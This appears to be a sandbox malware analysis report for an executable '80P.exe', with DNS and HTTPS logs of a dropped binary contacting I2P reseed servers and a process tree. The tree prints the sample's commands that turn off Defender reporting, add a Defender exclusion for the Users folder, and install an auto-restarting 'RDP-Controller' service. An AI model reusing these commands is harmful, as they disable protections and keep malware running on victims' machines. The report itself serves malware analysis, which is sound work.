                                                                  Jan 11, 2025 20:27:39.310236931 CET192.168.2.41.1.1.10xe338Standard query (0)reseed.onion.imA (IP address)IN (0x0001)false
                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Jan 11, 2025 20:26:23.110090017 CET1.1.1.1192.168.2.40x3d55No error (0)reseed-pl.i2pd.xyz185.226.181.238A (IP address)IN (0x0001)false
                                                                  Jan 11, 2025 20:26:24.272747040 CET1.1.1.1192.168.2.40x4ed6No error (0)reseed.i2pgit.org68.183.196.133A (IP address)IN (0x0001)false
                                                                  Jan 11, 2025 20:26:24.958410025 CET1.1.1.1192.168.2.40x3d98No error (0)reseed.diva.exchange80.74.145.70A (IP address)IN (0x0001)false
                                                                  Jan 11, 2025 20:27:39.357342958 CET1.1.1.1192.168.2.40xe338No error (0)reseed.onion.im159.223.194.171A (IP address)IN (0x0001)false
                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.449738185.226.181.2384434124C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-11 19:26:23 UTC104OUTGET https://reseed-pl.i2pd.xyz:443/i2pseeds.su3 HTTP/1.0
                                                                  User-Agent: Wget/1.11.4
                                                                  Connection: close
                                                                  2025-01-11 19:26:24 UTC160INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Sat, 11 Jan 2025 19:26:24 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Connection: close
                                                                  Vary: Accept-Encoding


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.44973968.183.196.1334434124C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-11 19:26:24 UTC103OUTGET https://reseed.i2pgit.org:443/i2pseeds.su3 HTTP/1.0
                                                                  User-Agent: Wget/1.11.4
                                                                  Connection: close
                                                                  2025-01-11 19:26:24 UTC152INHTTP/1.1 502 Bad Gateway
                                                                  Server: nginx/1.18.0
                                                                  Date: Sat, 11 Jan 2025 19:26:24 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 157
                                                                  Connection: close
                                                                  2025-01-11 19:26:24 UTC157INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.18.0</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  2192.168.2.44974080.74.145.704434124C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-11 19:26:25 UTC106OUTGET https://reseed.diva.exchange:443/i2pseeds.su3 HTTP/1.0
                                                                  User-Agent: Wget/1.11.4
                                                                  Connection: close
                                                                  2025-01-11 19:26:26 UTC406INHTTP/1.1 200 OK
                                                                  Server: nginx
                                                                  Date: Sat, 11 Jan 2025 19:26:25 GMT
                                                                  Content-Type: application/octet-stream
                                                                  Content-Length: 67276
                                                                  Connection: close
                                                                  Content-Disposition: attachment; filename=i2pseeds.su3
                                                                  Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                  X-Content-Type-Options: nosniff
                                                                  Onion-Location: http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su3
                                                                  2025-01-11 19:26:26 UTC15978INData Raw: 49 32 50 73 75 33 00 00 00 06 02 00 00 10 00 14 00 00 00 00 00 01 04 80 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 31 37 33 36 35 39 33 39 39 33 00 00 00 00 00 00 72 65 73 65 65 64 40 64 69 76 61 2e 65 78 63 68 61 6e 67 65 50 4b 03 04 14 00 08 00 08 00 87 58 2b 5a 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 09 00 72 6f 75 74 65 72 49 6e 66 6f 2d 79 46 64 67 37 4d 45 68 55 33 44 68 41 35 42 41 56 34 65 39 4b 4b 33 36 4f 69 73 54 46 41 68 75 42 54 74 4e 49 72 7a 32 78 35 55 3d 2e 64 61 74 55 54 05 00 01 2e 50 82 67 2a 89 ea 6d f9 a1 62 f3 4e eb dc 96 d5 7d 17 f3 2d 4b c4 ce 77 56 b8 6a 57 65 04 25 58 ed 8d f3 aa b4 34 f5 3c e0 b6 f2 ee 9a e7 cf ef 44 86 7d ff 17 13 c5 c1 ef 67 aa 58 bb a4 d9 59 21 e7 47 98 a1 c4 a8 3c 7e 79 c1 49 21 4a 6e 53 b7 8b 1c 17
                                                                  Data Ascii: I2Psu31736593993reseed@diva.exchangePKX+Z;routerInfo-yFdg7MEhU3DhA5BAV4e9KK36OisTFAhuBTtNIrz2x5U=.datUT.Pg*mbN}-KwVjWe%X4<D}gXY!G<~yI!JnS
                                                                  2025-01-11 19:26:26 UTC16384INData Raw: 22 b7 9f 28 36 1c 80 ae 85 34 cb b0 0c 24 85 09 81 e8 20 c5 02 9e a7 20 c9 91 13 b4 17 48 e0 39 92 e7 01 23 ec 57 a1 e9 fe 6a 29 3a 0a 3d b9 d2 f0 46 a6 da 7a c0 b2 bd d5 d0 a6 c3 35 47 0f 8d 82 5f d7 61 2b cd 8d d9 55 67 5a c5 35 7f ab 02 7b 63 52 c5 81 5c 5e bc fc a5 b9 bc ea 12 5e 3c 40 04 64 00 f8 f7 4e 5d 41 10 0c 33 27 de 13 8b 9d 86 98 f4 ed b8 6c ed f1 5b 7d 3b b6 cc cc aa 1f ac fb 8a 6d 44 76 dd 8e 23 94 80 90 13 6f fe 8b a4 05 83 d8 ee 47 88 a0 00 05 c5 99 fe fe 35 33 b4 fb 91 1b f8 e8 2a 90 11 32 2c 25 46 fe dd e6 43 ca 6d fa d6 4f da 33 ef 3c b5 70 ee fa ad c2 c7 a7 be 4e ef dc 79 6c b7 39 f7 b8 b4 b9 b8 75 f1 d5 f3 a7 2f 3e b7 fb cd dc e0 c6 8f 4e bd 75 0b 7c e1 33 fc 5b ff f0 97 9f 9a 97 ee 1a 7c 71 e8 f7 00 00 00 ff ff 50 4b 07 08 9e 98 c3
                                                                  Data Ascii: "(64$ H9#Wj):=Fz5G_a+UgZ5{cR\^^<@dN]A3'l[};mDv#oG53*2,%FCmO3<pNyl9u/>Nu|3[|qPK
                                                                  2025-01-11 19:26:26 UTC16384INData Raw: 0c 08 2d f5 28 72 76 75 a9 f2 f5 34 77 f3 88 88 f4 cd b3 74 2e 4b 0d b5 b5 66 29 c8 2f 2a b1 65 35 32 37 b6 30 b4 66 2c b6 d5 71 0d 4f cd 35 33 09 f0 0d 76 b6 8c f2 2e f5 72 f7 4d b7 48 f1 cb 08 77 0d f6 c9 f0 f4 70 f1 0e 2d f3 2f 2b 2a c9 ac 08 4a 34 f6 b5 b5 66 2c b3 65 34 b2 46 73 e2 7c 34 27 4a 1a 25 1a 18 5a 99 a4 59 58 19 19 18 58 99 98 18 19 5b 19 80 a1 d1 c0 38 97 1b e6 5c 56 bf 10 e7 00 23 86 32 5c 21 29 61 5e e7 ec 68 60 56 65 91 e7 57 91 91 16 6a 1a 92 5e ec 6c 19 94 6e 8b c5 19 c9 8e 15 89 ba 61 2e 4e a6 29 91 ae a6 5e 29 19 65 a6 25 59 ba c9 85 a1 99 ba 61 be e5 05 59 ae a5 51 91 46 89 be a1 1e 55 ee f9 b8 9c d1 44 4c 68 d1 d6 49 0c 0c 49 90 b8 63 8e 48 0b b2 66 cd 4b 2d f1 4c 01 89 8b e4 a5 96 a4 24 e9 65 e7 e5 97 e7 f9 a4 26 16 a7 06 a7 96
                                                                  Data Ascii: -(rvu4wt.Kf)/*e5270f,qO53v.rMHwp-/+*J4f,e4Fs|4'J%ZYXX[8\V#2\!)a^h`VeWj^lna.N)^)e%YaYQFUDLhIIcHfK-L$e&
                                                                  2025-01-11 19:26:26 UTC16384INData Raw: 2f 11 fa 70 f0 fc 66 f9 37 1b 75 85 72 9e 1b 2e 73 d4 90 4b d6 73 5a 64 ab 77 c9 ee f2 f6 80 e3 56 3b f5 b6 57 54 5e 8a f9 67 3f 6b c6 32 96 e0 87 bc 8c 32 ff aa 8f b4 be d9 f6 b5 62 92 df f1 03 69 eb 7f 57 c8 4d 99 ff ad f6 b4 eb b4 6d c5 3f a7 4b 8b 84 af dd da fa 24 f8 f2 a5 87 6b 12 b6 d6 6e d8 50 19 1e b6 ab e1 e5 37 e5 29 22 13 9e 5a 46 6c 0a 69 7f 39 77 c6 bf d2 ec cd 3d 4b 0b 3a 5b ae 07 7a ef 6d fd cc e4 fd ed 9d dd a4 13 15 97 6c af fb 0b 5b 7d 13 65 db db dc cb b9 da b1 7d 73 fb 5c 89 b6 ad 17 6b 3b 1e 5f 69 f3 3a f7 5f 75 5f 43 bd c8 c2 cd 2f 1e 56 7d 7e dd de c5 5c d7 e2 79 78 c3 97 49 47 85 97 06 48 6c 57 d8 b8 e4 55 fa c6 8c 95 96 42 1a 9a ee be cd d7 c4 6e 24 fd b3 3a b2 55 75 ea a6 57 2f 4e f6 6a 64 2c fd f7 74 a3 9e 08 73 d0 66 fb af 4d
                                                                  Data Ascii: /pf7ur.sKsZdwV;WT^g?k22biWMm?K$knP7)"ZFli9w=K:[zml[}e}s\k;_i:_u_C/V}~\yxIGHlWUBn$:UuW/Njd,tsfM
                                                                  2025-01-11 19:26:26 UTC2146INData Raw: 75 6f 3d 2e 64 61 74 55 54 05 00 01 e4 50 82 67 50 4b 01 02 14 00 14 00 08 00 08 00 89 59 2b 5a f1 b9 5f e3 1d 02 00 00 33 04 00 00 3b 00 09 00 00 00 00 00 00 00 00 00 00 00 75 b7 00 00 72 6f 75 74 65 72 49 6e 66 6f 2d 50 77 70 38 55 58 66 38 5a 52 62 2d 73 55 45 58 33 51 49 62 59 52 54 74 33 53 73 6a 79 66 72 44 36 46 43 6f 4e 49 6c 42 7a 6f 6b 3d 2e 64 61 74 55 54 05 00 01 12 52 82 67 50 4b 01 02 14 00 14 00 08 08 08 00 e8 58 2b 5a ac b9 86 d8 3a 03 00 00 f4 05 00 00 3b 00 09 00 00 00 00 00 00 00 00 00 00 00 04 ba 00 00 72 6f 75 74 65 72 49 6e 66 6f 2d 57 2d 79 56 5a 50 6a 41 67 59 45 36 48 34 62 59 4a 41 76 34 55 78 4e 7e 48 41 36 79 5a 35 49 6c 4d 63 73 7a 30 7e 62 30 6f 73 30 3d 2e 64 61 74 55 54 05 00 01 e4 50 82 67 50 4b 01 02 14 00 14 00 08 08 08
                                                                  Data Ascii: uo=.datUTPgPKY+Z_3;urouterInfo-Pwp8UXf8ZRb-sUEX3QIbYRTt3SsjyfrD6FCoNIlBzok=.datUTRgPKX+Z:;routerInfo-W-yVZPjAgYE6H4bYJAv4UxN~HA6yZ5IlMcsz0~b0os0=.datUTPgPK


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  3192.168.2.450035159.223.194.1714437008C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-11 19:27:40 UTC101OUTGET https://reseed.onion.im:443/i2pseeds.su3 HTTP/1.0
                                                                  User-Agent: Wget/1.11.4
                                                                  Connection: close
                                                                  2025-01-11 19:27:40 UTC370INHTTP/1.1 200 OK
                                                                  Server: nginx
                                                                  Date: Sat, 11 Jan 2025 19:27:40 GMT
                                                                  Content-Type: application/octet-stream
                                                                  Content-Length: 70505
                                                                  Connection: close
                                                                  Content-Disposition: attachment; filename=i2pseeds.su3
                                                                  X-Ratelimit-Limit: 4
                                                                  X-Ratelimit-Remaining: 3
                                                                  X-Ratelimit-Reset: 900
                                                                  Strict-Transport-Security: max-age=63072000; includeSubdomains;
                                                                  X-Frame-Options: DENY
                                                                  2025-01-11 19:27:40 UTC16014INData Raw: 49 32 50 73 75 33 00 00 00 06 02 00 00 10 00 12 00 00 00 00 00 01 11 1f 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 31 37 33 36 34 36 33 35 35 33 00 00 00 00 00 00 6c 61 7a 79 67 72 61 76 79 40 6d 61 69 6c 2e 69 32 70 50 4b 03 04 14 00 08 00 08 00 6a a0 29 5a 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 09 00 72 6f 75 74 65 72 49 6e 66 6f 2d 6c 61 4d 56 4d 79 52 71 33 53 6f 55 4f 43 58 43 36 74 34 43 78 4e 63 46 64 66 6c 65 58 46 30 77 6e 67 56 53 59 4d 54 4d 4e 4b 49 3d 2e 64 61 74 55 54 05 00 01 89 2b 80 67 32 33 5e d3 95 d3 dc be 2c fc 46 8f f9 07 81 9f a5 36 d2 9f 85 2e 7e 7d 2d c2 12 77 e8 db bd 6f 2b 4b 5b b5 bb df e6 5e 7c d1 15 2c 12 b3 2a 27 e6 26 27 57 b5 a3 e7 da e2 5b c7 76 8b f9 3c 70 9f aa 30 7f 54 1e bf 3c fb bf 26 d5 e8 84 6e 1d e9 d9 e6
                                                                  Data Ascii: I2Psu31736463553lazygravy@mail.i2pPKj)Z;routerInfo-laMVMyRq3SoUOCXC6t4CxNcFdfleXF0wngVSYMTMNKI=.datUT+g23^,F6.~}-wo+K[^|,*'&'W[v<p0T<&n
                                                                  2025-01-11 19:27:40 UTC16384INData Raw: 2b 03 00 00 50 4b 03 04 14 00 08 00 08 00 09 9e 29 5a 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 09 00 72 6f 75 74 65 72 49 6e 66 6f 2d 31 71 64 51 42 6d 5a 45 4a 6f 63 52 45 62 36 6c 42 53 34 75 70 58 47 71 43 77 50 50 69 6d 78 67 64 52 30 4c 62 67 2d 68 44 74 67 3d 2e 64 61 74 55 54 05 00 01 02 28 80 67 5a 14 7e de 95 ff 5d 49 f0 85 73 06 d7 16 7e 64 8a 2c 99 ee 3f 55 f7 e2 c4 a3 39 ff 77 fb b7 fe ef d4 6f 5f 5b f1 93 33 e2 b4 78 b2 e6 fe b3 79 ec ba 6f 56 f5 fd 9c 19 3d 9f b1 42 a3 5c e3 aa c0 aa 35 6b 46 e5 f1 cb 6b 88 ee 7a 34 59 2f 2c 58 73 81 bb b8 ec ed 20 86 db 39 21 36 8e d3 4f ce e3 ce 7b 2a d7 11 bc e5 2c 2b 03 0b 03 3b 03 0b 03 03 e3 14 9f 39 5e 22 4c cc 0c 50 c0 ea 17 e2 1c 60 c4 50 ce 92 91 5f 5c 62 cb 67 68 61 a1 67 68 6a a0 67 6e a6 67 64
                                                                  Data Ascii: +PK)Z;routerInfo-1qdQBmZEJocREb6lBS4upXGqCwPPimxgdR0Lbg-hDtg=.datUT(gZ~]Is~d,?U9wo_[3xyoV=B\5kFkz4Y/,Xs 9!6O{*,+;9^"LP`P_\bghaghjgngd
                                                                  2025-01-11 19:27:40 UTC16384INData Raw: a2 e2 cc fc 3c 5b 36 03 3d 4b 3d 53 73 eb cc d9 76 52 85 c5 66 ff 45 8c f2 1c c3 44 9c ef 56 e4 d6 af 2c fb 1d f1 9f 65 e5 e6 28 06 2b 95 6f 27 dc bf d5 57 a8 1e 5a f0 33 62 a6 a9 b5 55 b9 75 c6 85 4b f5 ed 3b e6 a8 19 7a 67 4d 5a 52 22 cb 04 08 00 00 ff ff 50 4b 07 08 fd 82 95 fd df 01 00 00 2e 03 00 00 50 4b 03 04 14 00 08 00 08 00 14 97 29 5a 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 09 00 72 6f 75 74 65 72 49 6e 66 6f 2d 50 75 6b 57 35 53 54 6d 4c 73 34 56 74 50 51 7a 4a 63 53 69 68 45 47 74 56 74 50 54 71 33 6f 6a 45 53 66 69 52 35 41 6e 70 4d 55 3d 2e 64 61 74 55 54 05 00 01 e9 1b 80 67 f2 0f 08 61 ff ed 2d e5 18 f7 79 ba 27 43 cf 92 14 b5 37 fc 4f b8 ca 64 f8 a6 3b f0 2a ab f2 4c ad 5b 7e df b4 52 70 f9 af a4 4d 5e 57 96 cd 7a 92 dd 5a f3 2d 69 75
                                                                  Data Ascii: <[6=K=SsvRfEDV,e(+o'WZ3bUuK;zgMZR"PK.PK)Z;routerInfo-PukW5STmLs4VtPQzJcSihEGtVtPTq3ojESfiR5AnpMU=.datUTga-y'C7Od;*L[~RpM^WzZ-iu
                                                                  2025-01-11 19:27:40 UTC16384INData Raw: 98 f0 c9 47 c6 ad 70 b3 91 f8 cb 95 cd 35 3e b7 04 9f fd 56 ff fb fb 6a c8 c3 e6 9e f7 c1 eb e5 5d 96 da 2f 09 57 8c cf 94 09 ed 63 65 60 61 60 67 60 61 60 60 9c e2 23 53 54 c0 c4 cc 00 05 ac 7e 21 ce 01 46 0c e5 2c 19 f9 c5 25 b6 7c 86 e6 16 7a 46 c6 26 7a e6 e6 7a 86 86 c6 d6 8c 99 b6 12 65 11 66 55 41 41 e6 3e 16 79 59 11 99 e9 45 95 5e 19 a1 b9 9e e5 b6 b6 d6 2c 05 f9 45 25 b6 ac 86 86 c6 a6 c6 d6 8c c5 b6 3a 06 51 a1 e5 45 41 2e 25 15 25 01 ee a9 c1 55 49 61 21 59 ba 29 06 59 45 55 9e 95 d9 a9 86 ba b9 e5 4e 3e 2e ae 1e 3e ba 69 d9 16 b6 d6 8c 65 b6 8c 46 d6 1c 30 77 b0 04 07 87 1a 31 4c 65 49 4e 2c 28 b6 65 72 72 b6 c6 e9 20 9d 72 5f 5d 5f 9f a2 dc 2a 93 90 88 8a d4 9c ec c2 dc d2 92 cc b0 92 3c 8f e4 a4 12 0b 0f ef 32 d3 8c dc 74 f3 9c 74 ff f2 3c
                                                                  Data Ascii: Gp5>Vj]/Wce`a`g`a``#ST~!F,%|zF&zzefUAA>yYE^,E%:QEA.%%UIa!Y)YEUN>.>ieF0w1LeIN,(err r_]_*<2tt<
                                                                  2025-01-11 19:27:40 UTC5339INData Raw: 68 38 63 3d 2e 64 61 74 55 54 05 00 01 94 23 80 67 50 4b 01 02 14 00 14 00 08 00 08 00 af 9a 29 5a 06 86 54 d3 35 04 00 00 8d 04 00 00 3b 00 09 00 00 00 00 00 00 00 00 00 00 00 60 6d 00 00 72 6f 75 74 65 72 49 6e 66 6f 2d 78 41 49 74 58 32 48 6e 5a 49 75 47 6b 34 75 57 4e 37 70 54 58 34 64 7a 52 50 71 66 6d 64 73 56 70 61 67 43 32 32 62 4e 4d 4e 77 3d 2e 64 61 74 55 54 05 00 01 ba 21 80 67 50 4b 01 02 14 00 14 00 08 00 08 00 8c 9c 29 5a f0 cb b4 1a 2a 02 00 00 93 04 00 00 3b 00 09 00 00 00 00 00 00 00 00 00 00 00 07 72 00 00 72 6f 75 74 65 72 49 6e 66 6f 2d 57 4b 66 71 45 45 71 34 32 53 56 71 74 55 7a 61 4a 2d 5a 55 5a 4e 51 70 49 38 71 59 31 48 2d 78 39 53 31 34 42 6c 41 65 62 67 77 3d 2e 64 61 74 55 54 05 00 01 39 25 80 67 50 4b 01 02 14 00 14 00 08 00
                                                                  Data Ascii: h8c=.datUT#gPK)ZT5;`mrouterInfo-xAItX2HnZIuGk4uWN7pTX4dzRPqfmdsVpagC22bNMNw=.datUT!gPK)Z*;rrouterInfo-WKfqEEq42SVqtUzaJ-ZUZNQpI8qY1H-x9S14BlAebgw=.datUT9%gPK


                                                                  Click to jump to process

                                                                  Click to jump to process

                                                                  Click to dive into process behavior distribution

                                                                  Click to jump to process

                                                                  Target ID:0
                                                                  Start time:14:26:00
                                                                  Start date:11/01/2025
                                                                  Path:C:\Users\user\Desktop\80P.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\Desktop\80P.exe"
                                                                  Imagebase:0x400000
                                                                  File size:13'431'296 bytes
                                                                  MD5 hash:F0CFD22855EE0CF1935A36EA32F15138
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:Borland Delphi
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:1
                                                                  Start time:14:26:00
                                                                  Start date:11/01/2025
                                                                  Path:C:\Users\user\Desktop\80P.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Users\user\Desktop\80P.exe
                                                                  Imagebase:0x400000
                                                                  File size:13'431'296 bytes
                                                                  MD5 hash:F0CFD22855EE0CF1935A36EA32F15138
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:Borland Delphi
                                                                  Reputation:low
                                                                  Has exited:false

                                                                  Target ID:2
                                                                  Start time:14:26:04
                                                                  Start date:11/01/2025
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\vlvy6qwtf6rg470fegk71sh09imwbh3.bat"
                                                                  Imagebase:0x7ff7e3600000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:3
                                                                  Start time:14:26:04
                                                                  Start date:11/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:4
                                                                  Start time:14:26:04
                                                                  Start date:11/01/2025
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"
                                                                  Imagebase:0x7ff788560000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:6
                                                                  Start time:14:26:07
                                                                  Start date:11/01/2025
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"
                                                                  Imagebase:0x7ff788560000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:7
                                                                  Start time:14:26:09
                                                                  Start date:11/01/2025
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
                                                                  Imagebase:0x7ff788560000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:9
                                                                  Start time:14:26:17
                                                                  Start date:11/01/2025
                                                                  Path:C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe"
                                                                  Imagebase:0x7ff65ce50000
                                                                  File size:10'669'056 bytes
                                                                  MD5 hash:2F829F1CB631D234C54F2E6C6F72EB57
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 70%, ReversingLabs
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:10
                                                                  Start time:14:26:20
                                                                  Start date:11/01/2025
                                                                  Path:C:\Windows\System32\taskkill.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:taskkill.exe /F /FI "SERVICES eq RDP-Controller"
                                                                  Imagebase:0x7ff6f3100000
                                                                  File size:101'376 bytes
                                                                  MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  Target ID:11
                                                                  Start time:14:26:20
                                                                  Start date:11/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:12
                                                                  Start time:14:26:20
                                                                  Start date:11/01/2025
                                                                  Path:C:\Windows\System32\sc.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:sc.exe stop RDP-Controller
                                                                  Imagebase:0x7ff77e8b0000
                                                                  File size:72'192 bytes
                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:13
                                                                  Start time:14:26:20
                                                                  Start date:11/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:14
                                                                  Start time:14:26:21
                                                                  Start date:11/01/2025
                                                                  Path:C:\Windows\System32\sc.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore
                                                                  Imagebase:0x7ff77e8b0000
                                                                  File size:72'192 bytes
                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:15
                                                                  Start time:14:26:21
                                                                  Start date:11/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:16
                                                                  Start time:14:26:21
                                                                  Start date:11/01/2025
                                                                  Path:C:\Windows\System32\sc.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:sc.exe failure RDP-Controller reset= 1 actions= restart/10000
                                                                  Imagebase:0x7ff77e8b0000
                                                                  File size:72'192 bytes
                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:17
                                                                  Start time:14:26:21
                                                                  Start date:11/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:18
                                                                  Start time:14:26:21
                                                                  Start date:11/01/2025
                                                                  Path:C:\Windows\System32\sc.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:sc.exe start RDP-Controller
                                                                  Imagebase:0x7ff77e8b0000
                                                                  File size:72'192 bytes
                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
